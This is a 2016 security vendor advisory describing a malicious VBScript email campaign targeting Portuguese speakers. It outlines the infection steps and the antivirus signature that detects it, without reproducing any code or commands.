A wave of malicious VBScript may lead to financial fraud (Jan 22, 2016)
The Dell SonicWALL Threats Research team has observed a recent wave of malicious VBScript files targeting the Portuguese-speaking population. These files arrive as attachments to emails purporting to be important bank documents.
Infection Cycle
The file arrives as a zip file attachment to an email.
Figure 1: Spam email with a malicious zip attachment
The archive contains a file with a .vbs or .vbe file extension with names such as the following:
Figure 2: Malicious VBScript filename examples
Upon execution the malware makes a DNS query to the following domains:
Figure 3: DNS queries made to random domain names in attempt to contact the remote server
It then downloads additional malicious files:
Figure 4: HTTP GET request made by this malware
It also tried to connect to another remote server possibly to send information out. But at the time of analysis, that server appeared to have already been taken down.
Figure 5: TCP connection requests made to abuse-sinkhole.changeip.net
Our statistics show that countries with Portuguese-speaking population are the main target of this attack with Brazil being hit most, followed by Portugal, US, Uruguay and Spain. The signature hits show a clear upward trend in the number of infections detected over the past week.
Overall, this Trojan is capable of downloading additional malware into the victim’s machine. It can also send sensitive information out to a remote server. We urge our users to always be vigilant and cautious with any unsolicited emails specially if you are not certain of the source.
Dell SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:
- GAV: Download.VBS (Trojan)
